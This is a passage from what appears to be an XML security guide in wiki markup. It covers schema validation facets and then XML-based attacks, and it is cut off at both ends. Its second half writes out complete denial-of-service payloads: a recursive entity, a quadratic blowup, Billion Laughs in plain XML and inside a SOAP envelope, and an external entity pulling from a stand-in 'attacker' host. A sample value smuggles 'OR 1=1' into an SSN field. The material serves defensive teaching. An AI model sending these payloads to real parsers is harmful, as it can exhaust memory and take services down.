    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to one specific length (let's say 8), the exact length can be specified as follows:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only values between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed for an SSN.&lt;br /&gt;
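XML Schema patterns are implicitly anchored, so the whole value must match the expression. As a short illustration with made-up values, the first element below would be accepted by the pattern and the other two would be rejected:&lt;br /&gt;
 &amp;lt;!-- Accepted: matches the pattern exactly --&amp;gt;&lt;br /&gt;
 &amp;lt;SSN&amp;gt;123-45-6789&amp;lt;/SSN&amp;gt;&lt;br /&gt;
 &amp;lt;!-- Rejected: the separators are missing --&amp;gt;&lt;br /&gt;
 &amp;lt;SSN&amp;gt;123456789&amp;lt;/SSN&amp;gt;&lt;br /&gt;
 &amp;lt;!-- Rejected: extra characters follow an otherwise valid value --&amp;gt;&lt;br /&gt;
 &amp;lt;SSN&amp;gt;123-45-6789 OR 1=1&amp;lt;/SSN&amp;gt;&lt;br /&gt;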
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
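The &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; facet was introduced in XML Schema 1.1, so processors limited to version 1.0 will not accept it. As a hedged alternative for such processors, a sketch using a &amp;lt;tt&amp;gt;union&amp;lt;/tt&amp;gt; of two built-in types could express the same rule (every integer except zero):&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;!-- Valid values are either below zero or above zero, never zero itself --&amp;gt;&lt;br /&gt;
   &amp;lt;xs:'''union''' memberTypes=&amp;quot;xs:negativeInteger xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;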
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Leaving the maximum number of occurrences undefined can have serious consequences when the application receives an extreme number of items to process. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;0&amp;lt;/tt&amp;gt;, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
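As a sketch of a bounded alternative, the declaration could set an explicit limit. The value 100 is an assumed limit, and &amp;lt;tt&amp;gt;buyType&amp;lt;/tt&amp;gt; is a hypothetical named type standing in for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; definition:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;!-- Assumed limit: documents with more than 100 buy elements fail validation --&amp;gt;&lt;br /&gt;
    &amp;lt;xs:element name=&amp;quot;buy&amp;quot; type=&amp;quot;buyType&amp;quot; '''maxOccurs'''=&amp;quot;'''100'''&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;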
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;soapenv:Envelope xmlns:soapenv=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot; xmlns:ext=&amp;quot;http://com/ibm/was/wssample/sei/echo/b2b/external&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;soapenv:Header '''LARGENAME1'''=&amp;quot;'''LARGEVALUE1'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the &amp;lt;tt&amp;gt;note&amp;lt;/tt&amp;gt; element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contain a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When XML documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker could sniff the connection and modify the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted over unencrypted HTTP. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an Internet Protocol (IP) address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own IP addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the schema describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n&amp;lt;sup&amp;gt;2&amp;lt;/sup&amp;gt;)). The result of the following attack will be 100,000*100,000 (10 billion) characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the nested entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as 10 references to &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; each of these will be resolved as 10 references to &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt;, and so on. Finally, the CPU and/or memory will be affected by expanding the resulting 10^9 (1,000,000,000) copies of the string &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, roughly 3*10^9 (3,000,000,000) characters, which could make the parser crash.&lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
